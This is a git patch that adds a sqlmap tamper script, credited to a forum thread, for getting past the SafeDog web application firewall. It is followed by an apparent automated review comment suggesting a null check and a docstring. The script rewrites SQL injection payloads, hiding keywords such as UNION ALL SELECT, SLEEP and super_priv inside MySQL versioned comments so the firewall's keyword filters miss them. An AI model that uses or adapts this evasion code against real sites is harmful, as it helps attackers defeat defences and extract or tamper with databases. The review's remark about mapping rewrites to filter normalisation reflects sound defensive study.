From 6cd3e117be732a928e98adf0dc5b885d3974d91d Mon Sep 17 00:00:00 2001
From: Mrxn
Date: Sun, 20 Dec 2020 20:40:55 +0800
Subject: [PATCH] =?UTF-8?q?add=20sqlmap=5Fbypass=5F=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E7=8B=972=5Ftamper.py?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
tools/sqlmap_bypass_安全狗2_tamper.py | 20 ++++++++++++++++++++
1 file changed, 20 insertions(+)
create mode 100755 tools/sqlmap_bypass_安全狗2_tamper.py
diff --git a/tools/sqlmap_bypass_安全狗2_tamper.py b/tools/sqlmap_bypass_安全狗2_tamper.py
new file mode 100755
index 0000000..6723376
--- /dev/null
+++ b/tools/sqlmap_bypass_安全狗2_tamper.py
@@ -0,0 +1,20 @@
+# coding=UTF-8
+# Desc: sqlmap_bypass_安全狗2_tamper
+# from: https://www.t00ls.net/thread-58882-1-1.html
+
+from lib.core.enums import PRIORITY
+__priority__ = PRIORITY.LOW
+
+def tamper(payload, **kwargs):
+ payload=payload.replace('AND','/*!29440AND*/')
+ payload=payload.replace('ORDER','/*!29440order*/')
+ payload=payload.replace('LIKE USER()','like (user/**/())')
+ payload=payload.replace('DATABASE()','database/*!29440*/()')
+ payload=payload.replace('CURRENT_USER()','CURRENT_USER/**/()')
+ payload=payload.replace('SESSION_USER()','SESSION_USER(%0a)')
+ payload=payload.replace('UNION ALL SELECT','union/*!29440select*/')
+ payload=payload.replace('super_priv','/*!29440/**/super_priv*/')
+ payload=payload.replace('and host=','/*!29440and*/host/*!11440=*/')
+ payload=payload.replace('BENCHMARK(','BENCHMARK/*!29440*/(')
+ payload=payload.replace('SLEEP(','sleep/**/(')
+ return payload
\ No newline at end of file
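Review bot: `tamper()` calls `payload.replace(...)` in its first statement with no check that `payload` is set, and the function carries no docstring. sqlmap's bundled tamper scripts conventionally pass an empty payload straight through, so a `None` here would presumably raise `AttributeError`; I would add `if not payload: return payload` as the first line of the body. A docstring should state that the function does case-sensitive plain substring replacement, wrapping MySQL keywords and function calls in versioned `/*!29440 ... */` or empty `/**/` comments, and should record which product and version the rules were checked against, since the header only links a forum thread. That record also lets a defender map each rewrite to the comment-normalisation step a filter needs before keyword matching.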